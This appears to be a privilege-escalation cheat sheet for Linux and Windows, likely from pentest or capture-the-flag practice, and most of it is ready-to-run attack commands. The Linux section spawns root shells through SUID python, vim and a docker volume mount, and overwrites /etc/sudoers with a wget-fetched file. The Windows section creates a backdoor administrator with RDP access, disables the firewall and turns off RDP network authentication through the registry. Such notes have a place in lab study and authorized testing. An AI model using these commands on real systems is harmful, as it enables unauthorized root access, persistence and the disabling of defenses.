Priv Escalation

Linux

Enumeration

Monitor running file

Taken from an ippsec video

IFS=$'\n'

old_process=$(ps -eo command)

while true; do
  new_process=$(ps -eo command)
  diff <(echo "$old_process") <(echo "$new_process") |grep [\<\>]
  sleep 1
  old_process=$new_process
done

Capabilities & Setuid

/sbin/getcap -r / 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

Exploitation

python

./python -c 'import os; os.setuid(0); os.system("/bin/sh")'

vim

:set shell=/bin/bash
:shell

wget

$ echo "limited_account ALL=(ALL) NOPASSWD: ALL" > /tmp/sudoers
$ python -m SimpleHTTPServer 8080 &
$ wget 0.0.0.0:8080/tmp/sudoers -O /etc/sudoers
$ sudo /bin/bash

docker

echo -e "FROM debian:stretch-slim\nENV WORKDIR /stuff\nRUN mkdir -p /stuff\nVOLUME [ /stuff ]\nWORKDIR /stuff" > Dockerfile && docker build -t my-docker-image . && docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c 'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh' && ./sh -c id && ./sh

Writing code without an editor

$ echo "TheCodeInBase64==" | base64 -d > code.c

Shadow file

Generate sha512 password

python -c "import random,string,crypt;
randomsalt = ''.join(random.sample(string.ascii_letters,8));
print crypt.crypt('MySecretPassword', '\$6\$%s\$' % randomsalt)"

Finding exploit

Compilation

“error while loading shared libraries: requires glibc 2.5 or later dynamic linker”?

The cause of this error is the dynamic binary (or one of its dependent shared libraries) you want to run only has .gnu.hash section, but the ld.so on the target machine is too old to recognize .gnu.hash; it only recognizes the old-school .hash section.

This usually happens when the dynamic binary in question is built using newer version of GCC. The solution is to recompile the code with either -static compiler command-line option (to create a static binary), or the following option:

-Wl,--hash-style=both

Windows

Windows Exploit Suggester:

Get sysinfo

systeminfo > sys.info

Update and run the Exploit Suggester:

python windows-exploit-suggester.py -u
python windows-exploit-suggester -d <databasefile> -i <sysinfofile>

Add user and allow rdp

net user poneyUser SecretPassword /add
net localgroup Administrators poneyUser /add
net localgroup "Remote Desktop Users" poneyUser /ADD

Enable RDP


### Turn firewall off

netsh firewall set opmode disable```

Or


If error:

"ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
Failed to connect, CredSSP required by server.""

Add :

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f```